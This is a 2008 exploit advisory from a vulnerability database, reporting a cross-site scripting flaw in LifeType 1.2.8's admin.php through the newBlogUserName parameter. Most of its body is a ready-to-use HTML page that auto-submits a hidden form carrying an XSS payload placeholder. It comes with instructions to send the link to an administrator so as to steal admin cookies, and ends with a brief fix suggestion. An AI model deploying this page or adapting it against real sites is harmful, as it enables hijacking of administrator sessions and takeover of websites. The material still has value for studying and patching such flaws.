Lucene search
K

lifetype128-xss.txt

🗓️ 05 May 2008 00:00:00Reported by IRCRASHType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

XSS Vulnerability in LifeType 1.2.8, allows admin cookies retrieval via newBlogUserName variable. Exploit page: http://mesh.dl.sourceforge.net/sourceforge/lifetype/lifetype-1.2.8.tar.bz2

Code
`----------------------------------------------------------------  
Script : LifeType 1.2.8  
Type : XSS Vulnerability  
----------------------------------------------------------------  
Discovered by : Khashayar Fereidani Or Dr.Crash  
Our Team : IRCRASH  
----------------------------------------------------------------  
Our Site : Http://IRCRASH.COM  
IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM  
----------------------------------------------------------------  
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr  
----------------------------------------------------------------  
Script Download : http://mesh.dl.sourceforge.net/sourceforge/lifetype/lifetype-1.2.8.tar.bz2  
----------------------------------------------------------------  
Type : Cross Site Scripting  
Method Of Send : POST  
File Name : http://Example/admin.php?op=editArticleCategories  
Vulnerable Variable : newBlogUserName  
Set "Add this user" Variable : "Add"  
Set "op" Variable : "addBlogUser"  
You Can Get Admin Cookie With This Vuln ....  
----------------------------------------------------------------  
Exploit :  
Upload This Page And Send Link For Administrator .  
________________________________  
<html>  
<head></head>  
#Vulnerabily discovered by Khashayar Fereidani Or Dr.Crash  
<body onLoad=javascript:document.form.submit()>  
  
<form action="http://Example/lifetype/admin.php?op=editArticleCategories"  
  
method="POST" name="form">  
  
<input type="hidden" name="newBlogUserName" value="&#x22;&#x20;[XSS CODE]">  
<input type="hidden" name="Add this user" value="Add">  
<input type="hidden" name="op" value="addBlogUser">  
  
</form>  
</body>  
</html>  
________________________________  
----------------------------------------------------------------  
Solution : Edit Source Code And Filter newBlogUserName Variable With htmlspecialchar() function .......  
----------------------------------------------------------------  
TNx : God......  
Khashayar Fereidani Email : irancrash[at]gmail[dot]com  
IRCRASH TEAM - Http://IRCRASH.COM/  
----------------------------------------------------------------  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 May 2008 00:00Current
7.4High risk
Vulners AI Score7.4
19